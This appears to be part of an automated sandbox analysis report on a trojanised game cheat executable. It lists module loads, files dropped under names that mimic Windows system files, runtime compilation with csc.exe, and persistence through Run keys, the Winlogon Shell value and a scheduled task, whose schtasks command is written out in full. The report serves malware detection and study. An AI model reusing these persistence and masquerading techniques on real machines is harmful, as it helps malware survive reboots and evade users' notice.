                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                     Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
                                     Source: Window Recorder Window detected: More than 3 window changes detected
                                     Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                     Source: C:\msportComWin\BridgePortsurrogateserverref.exe Directory created: C:\Program Files\Uninstall Information\jnowHpJlZlXal.exe
                                     Source: C:\msportComWin\BridgePortsurrogateserverref.exe Directory created: C:\Program Files\Uninstall Information\7ebef5d49c4292
                                     Source: C:\msportComWin\BridgePortsurrogateserverref.exe Directory created: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe
                                     Source: C:\msportComWin\BridgePortsurrogateserverref.exe Directory created: C:\Program Files\7-Zip\Lang\7ebef5d49c4292
                                     Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe Static file information: File size 2324826 > 1048576
                                     Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                     Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                     Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                     Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                     Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                     Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                     Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                     Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe
                                     Source: Binary string: ;C:\Users\user\AppData\Local\Temp\qtco0uvf\qtco0uvf.pdb source: BridgePortsurrogateserverref.exe, 0000000A.00000002.1520293640.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp
                                     Source: Binary string: ;C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.pdb source: BridgePortsurrogateserverref.exe, 0000000A.00000002.1520293640.0000000003B6D000.00000004.00000800.00020000.00000000.sdmp
                                     Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                     Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                     Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                     Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                     Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                     Source: C:\msportComWin\BridgePortsurrogateserverref.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5fi0urd\m5fi0urd.cmdline"
                                     Source: C:\msportComWin\BridgePortsurrogateserverref.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qtco0uvf\qtco0uvf.cmdline"
                                     Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe File created: C:\msportComWin\__tmp_rar_sfx_access_check_4208109
                                     Source: SAMP_CHEAT_ATVECHAU2.exe.bin.exe Static PE information: section name: .didat
                                     Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe Code function: 0_2_00D0F640 push ecx; ret 0_2_00D0F653
                                     Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe Code function: 0_2_00D0EB78 push eax; ret 0_2_00D0EB96
                                     Source: C:\msportComWin\BridgePortsurrogateserverref.exe Code function: 10_2_00007FFAAC584B5B push edi; retf 10_2_00007FFAAC584B60
                                     Source: C:\msportComWin\BridgePortsurrogateserverref.exe Code function: 10_2_00007FFAAC58535A push edi; ret 10_2_00007FFAAC585360
                                     Source: BridgePortsurrogateserverref.exe.0.dr Static PE information: section name: .text entropy: 7.571236871743646
                                     Source: services.exe.10.dr Static PE information: section name: .text entropy: 7.571236871743646
                                     Source: jnowHpJlZlXal.exe.10.dr Static PE information: section name: .text entropy: 7.571236871743646
                                     Source: jnowHpJlZlXal.exe0.10.dr Static PE information: section name: .text entropy: 7.571236871743646
                                     Source: jnowHpJlZlXal.exe1.10.dr Static PE information: section name: .text entropy: 7.571236871743646
                                     Source: jnowHpJlZlXal.exe2.10.dr Static PE information: section name: .text entropy: 7.571236871743646

                                    Persistence and Installation Behavior

                                     Source: C:\msportComWin\BridgePortsurrogateserverref.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (18 calls)
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | File created: C:\Recovery\services.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | File created: C:\Users\user\Desktop\fSPDjruA.log
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Windows\System32\SecurityHealthSystray.exe
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | File created: C:\Recovery\jnowHpJlZlXal.exe
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | File created: C:\Users\user\Desktop\VrgGeyQY.log
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | File created: C:\Users\user\Desktop\VjwnzPpT.log
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | File created: C:\Program Files\7-Zip\Lang\jnowHpJlZlXal.exe
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | File created: C:\Users\user\Desktop\MGoyPVal.log
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | File created: C:\Users\user\Desktop\EcfIfcKE.log
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | File created: C:\Program Files\Uninstall Information\jnowHpJlZlXal.exe
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | File created: C:\msportComWin\jnowHpJlZlXal.exe
                                    Source: C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe | File created: C:\msportComWin\BridgePortsurrogateserverref.exe
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | File created: C:\Users\user\Desktop\vyXTwjuX.log

                                    Boot Survival

                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run services
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BridgePortsurrogateserverref
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run jnowHpJlZlXal
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "jnowHpJlZlXalj" /sc MINUTE /mo 13 /tr "'C:\Program Files\Uninstall Information\jnowHpJlZlXal.exe'" /rl HIGHEST /f
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run services
                                    Source: C:\msportComWin\BridgePortsurrogateserverref.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run jnowHpJlZlXal

                                    Hooking and other Techniques for Hiding and Protection

                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
